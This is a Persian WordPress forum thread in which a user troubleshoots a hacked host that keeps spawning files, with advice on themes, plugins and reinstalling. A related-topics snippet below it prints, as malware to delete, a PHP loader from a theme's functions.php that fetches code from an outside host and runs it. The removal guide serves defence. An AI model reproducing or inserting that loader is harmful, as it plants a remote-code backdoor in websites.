دکتر مهندس

ویروس هاست
ویروسی شدن هاست و خراب شدن سایت

14 پست در این موضوع قرار دارد

سلام دوستان

توی هاست من توی دوتا از پوشه ها بصورت عجیبی یهویی داره تعداد زیادی فایلهای نامفهوم رشد میکنه. فعلا دسترسی اون دوتا پوشه رو روی 000 قرار دادم و مشکل تکثیر فایلها حذف شد. اما هنوز نتونستم دلیلش رو پیدا کنم. با ویروس اسکنر خود سی پنل هم اسکن کردم اما چیزی پیدا نکرد.

ضمنا این مسأله باعث شده دسترسی به مدیریت وردپرس هم نداشته باشم و خود سایت هم که در آدرس http://jadnews.ir مشخص هست که چه بلایی سرش اومده.

چطور میشه پیدا کنم که فایل ویروس کجاست؟

0

به اشتراک گذاری این پست


لینک به پست

درود ، 

برای مدیریت هاست تیکت ارسال کنید. (نظر شخصی من)

0

به اشتراک گذاری این پست


لینک به پست
در 1 دقیقه قبل، mojtabashahi گفته است :

درود ، 

برای مدیریت هاست تیکت ارسال کنید. (نظر شخصی من)

خب تیکت زدم، اونها هم میگن مورد رو توسط یک برنامه نویس پیگیری کنید.

0

به اشتراک گذاری این پست


لینک به پست

توسط سایت ویروس توتال سایت خود را بررسی کنید. (برای آی پی ایران مسدود می باشد)

ویرایش شده در توسط mojtabashahi
0

به اشتراک گذاری این پست


لینک به پست
در 4 دقیقه قبل، mojtabashahi گفته است :

توسط سایت ویروس توتال سایت خود را بررسی کنید. (برای آی پی ایران مسدود می باشد)

با این سایت که نمیشه داخل هاست رو بررسی کرد. فقط فایلهای عمومی یعنی پوشه public html رو بررسی میکنه 

0

به اشتراک گذاری این پست


لینک به پست

نتیجه را اینجا می توانید ببینید. مشکل از هاستینگ شما می باشد.

ویرایش شده در توسط mojtabashahi
0

به اشتراک گذاری این پست


لینک به پست

مشکل از جانب مدیر سرور هست (ضعف در مدیریت سرور هاستینگ) / اگر ابیوز میاد سمت سرور و روی هاستتون فایل های مخرب یا ... اضافه میشه . / مگر اینکه شخصی اطلاعات هاستتون رو داشته باشه و ...

بهتره هاستینگ رو تغییر بدید .

وردپرس رو هم به صورت دستی به روزرسانی کنید که مشکل عدم ورود به پنل ادمین براتون رفع بشه .

0

به اشتراک گذاری این پست


لینک به پست
در 3 دقیقه قبل، mojtabashahi گفته است :

نتیجه را اینجا می توانید ببینید. مشکل از هاستینگ شما می باشد.

خب آی پی های خارج رو بلوک کردن چونکه گفتن ارجاعات از خارج خیلی زیاد بوده و مشکل ساز شده بوده برای سرور.

0

به اشتراک گذاری این پست


لینک به پست

منظورم خاموش بودن فایروال هاست شما می باشد.

0

به اشتراک گذاری این پست


لینک به پست
در 13 ساعت قبل، mojtabashahi گفته است :

منظورم خاموش بودن فایروال هاست شما می باشد.

سرور رو بررسی کردند و سرور مشکلی نداشت. گفتند فایلها توسط اسکریپت شما ساخته میشه. 

وردپرس رو هم بجز پوشه wp-content دوباره جایگزین کردم. اما باز هم مشکل حل نشد. چه میشه کرد به نظرتون؟

0

به اشتراک گذاری این پست


لینک به پست

درود

اول از هاستتون مطمعن بشید و بعد از مطمعن شدن پوسته و افزونه هاتون رو بررسی کنید احتمالا کد مخربی وجود داره که باعث میشه این اتفاق بیفته

پوستتون رو با پوسته پیش فرض تغییر بدین و موقتی افزونه ها رو هم همرو غیر فعال کنید ( اسم پوششو تغییر بدین ) بعد ببینید بازم مشکلی داره یا نه

اگر داشت یعنی مشکل از هاسته اگر نه چک کنید کدهای مخرب کجای پوسته یا افزونه هست

1

به اشتراک گذاری این پست


لینک به پست
در 34 دقیقه قبل، kasra گفته است :

درود

اول از هاستتون مطمعن بشید و بعد از مطمعن شدن پوسته و افزونه هاتون رو بررسی کنید احتمالا کد مخربی وجود داره که باعث میشه این اتفاق بیفته

پوستتون رو با پوسته پیش فرض تغییر بدین و موقتی افزونه ها رو هم همرو غیر فعال کنید ( اسم پوششو تغییر بدین ) بعد ببینید بازم مشکلی داره یا نه

اگر داشت یعنی مشکل از هاسته اگر نه چک کنید کدهای مخرب کجای پوسته یا افزونه هست

آخه اصلا نمیتونم وارد مدیریت وردپرس بشم که پوسته رو عوض کنم. از توی هاست هم که پوسته رو تغییر نام میدم، روی پوسته های پیشفرض نمیره.

فعلا بک آپ دو هفته قبل رو برگردوندم اما متأسفانه باز هم مشکل داره. یعنی قدیمی ترین بکآپ هم مال زمانی هست که سایت مشکل داشته.

0

به اشتراک گذاری این پست


لینک به پست
در در 8/24/2016 at 02:04، دکتر مهندس گفته است :

آخه اصلا نمیتونم وارد مدیریت وردپرس بشم که پوسته رو عوض کنم. از توی هاست هم که پوسته رو تغییر نام میدم، روی پوسته های پیشفرض نمیره.

فعلا بک آپ دو هفته قبل رو برگردوندم اما متأسفانه باز هم مشکل داره. یعنی قدیمی ترین بکآپ هم مال زمانی هست که سایت مشکل داشته.

وارد phpmyadmin بشید و تو جدول آپشن اسم پوسترو به پوسته پیش فرض تغییر بدین

مشکلی تو ورود به مدیریت هم نباید باشه ( افزونه هارو پوششو غیر فعال کنید ) و بعد وارد بشید

نهایت اینکه وردپرس رو کامل حذف کنید و دوباره به صورت دستی فایل های جدید رو آپلود کنید و بعد پوشه wp-content خودتون رو جایگزین کنید

0

به اشتراک گذاری این پست


لینک به پست
در در 8/23/2016 at 10:46، دکتر مهندس گفته است :

سلام دوستان

توی هاست من توی دوتا از پوشه ها بصورت عجیبی یهویی داره تعداد زیادی فایلهای نامفهوم رشد میکنه. فعلا دسترسی اون دوتا پوشه رو روی 000 قرار دادم و مشکل تکثیر فایلها حذف شد. اما هنوز نتونستم دلیلش رو پیدا کنم. با ویروس اسکنر خود سی پنل هم اسکن کردم اما چیزی پیدا نکرد.

ضمنا این مسأله باعث شده دسترسی به مدیریت وردپرس هم نداشته باشم و خود سایت هم که در آدرس http://jadnews.ir مشخص هست که چه بلایی سرش اومده.

چطور میشه پیدا کنم که فایل ویروس کجاست؟

منم همین مشکل رو داشتم و هاستم هم میهن وب هاسته و اونا هم همینو میگفتن با عوض کردن پوسته درست شد و فایل های جدید رو جایگذین کردم مشکل اصلی هم Wp-config بود که درستش کردم

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط azhin1
      با سلام 
      سایت من شل های ویروسی زیادی بصورت ناخواسته نصب شده از چه طریق میتونم شناسایی و از بین ببرمشون؟
    • توسط master89
      دوستان سلام
      یک ویروس جدید اومده برای وردپرس که تبلیغات دزدید میکنه. به این صورت که پاپ آپ کلیکی باز میکنه و توی موبایل بدون کلیک پاپ آپ میذاره.
      جالبش اینجاس که روی آی پی Admin وردپرس پاپ آپ نداره و حتی کد هم نمیتونید پیدا کنید!
      شما میتونید از "پنجره ناشناس" فایرفاکس سایت خودتون رو باز کنید و کد و پاپ آپ رو ببینید. اما باز هم اگه با FTP برید داخل همون صفحه و بخواید کد رو پاک کنید. کد مخفی میشه. به این صورت که با هر بار بارگذاری صفحه کد از جایی بازخوانی میشه.
      توی انجمن های فارسی که بحثی ازش نشده فکر کنم، توی انجمن های خارجی هم بحث شده اما جوابی دریافت نشده.
      صفحه اصلی تبلیغ دزد: go.pub2srv.com هست. که هر بار لینک های تبلیغاتی متفاوتی همراه خودش میتونه داشته باشه. راه های زیادی برای از بین بردنش هست. اما باز بر میگرده و به مرور بیشتر میشه.
      نکته آخر : این ویروس با قالب های نال شده و غیر قانونی وارد وبسایت شما میشه. معمولا هم ارائه دهنده این قالب ها سایت vestatheme هست که اکثر وبسایت هایی که قالب های تجاری رو رایگان برای دانلود میذارن، از این وبسایت دریافت میکنند (پس اکثر سایت ها خطرناک شدن)
      آموزش حذف ویروس :
      اول سایتتون رو اینجا وارد کنید و چک کنید
      https://sitecheck.sucuri.net/  
      حالا برید داخل فلدر قالبتون / فایل function.php رو پیدا کنید و ویرایش کنید
      و قطعه کد زیر رو ازش حذف کنید
      if ( ! function_exists( 'wp_temp_setup' ) ) { $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI]; if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path)) { function wp_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(wp_temp_setup($tmpcontent)); } } ?> حالا افزونه  Exploit Scanner رو نصب کنید و اسکن کنید. پس از پایان اسکن ctrl+f رو بزنید و go.pub رو جستجو کنید. اگر نبود، یعنی همه چیز درسته.
      (این افزونه کد های مخفی رو پیدا میکنه و نمایش میده)
      سپاس
    • توسط sajadshiraz
      با سلام
      چند روز میشه وردپرس من مشکل بهم زده
      روز اول متوجه شدم سایت فقط صفحه اول باز میشه بقیه صفحات ارور 404 میده
      پرسیدم گفتن پیوند یکتا تغییر کرده درستش کردم ولی بازم تغییر کرد
      تو هاست چک کردم دیدم فایل htaccess مشکل داره و مشکلش اینه که بعد از چند ساعت از پاک کردنش دوباره permission از حالت 644 به 444 تغییر پیدا میکنه و حجمش تند تند اضافه میشه و بعد از اینکه حجم زیاد شد دیگه ارور 404 شروع میشه
      با هاست در میان گذاشتم چندین بار ویروس یابی کردن میگن مشکلی نیست
      قالب ها رو کلا حذف کردم
      افزونه ها رو کلا حذف کردم
      بازم این مشکل وجود داره
      خواهشا راهنمایی کنید
    • توسط سعید شعبانی
      دوستان سلام
      کامپیوتر من قبلا ویروسی شده بود ولی مشکلی نداشت تا اینکه دیروز باز چندتا ویروس جدید از طریق فلش وارد کامپیوترم شدند و همچی رو زدند داغون کردند. ویندوز(8) بالا می یومد ولی اصلا هیچی پیدا نبود (فقط یه صفحه سیاه میومد) که با task manager می شد computer را باز کرد و باهاش کار کرد ولی من دیگه ویندوز رو عوض کردم و آنتی ویروس node 32 را نصب و آپدیت کردم. حالا که خواستم وارد داشبورد سایت وردپرسیم بشم نود 32 گفت که داخل آدرس dnoj.ir/wp-admin یک تروجان هست. آیا واقعا سایتم ویروسی شده؟ باید چیکارش کنم؟ (با آنتی ویروس cpanel هم وقتی چکش می کنم هیچ ویروسی پیدا نمی کنه)
      تصویری از قرنطینه نود32 (به اولین مورد توجه کنید)

    • توسط Amir.
      سلام به عزیزان .
      سایت دوستمون به ادرس
      varannews.ir ظاهرا دچار یه جور ویروس شده .
      در تصویر پیوست شده اشکالی که آنتی ویروس نورتون بنده ازش میگیره رو قرار دادم
      دوستان به سورس سایت یه نگاهی بندازند و بگن مشکل از کدوم کد هستش !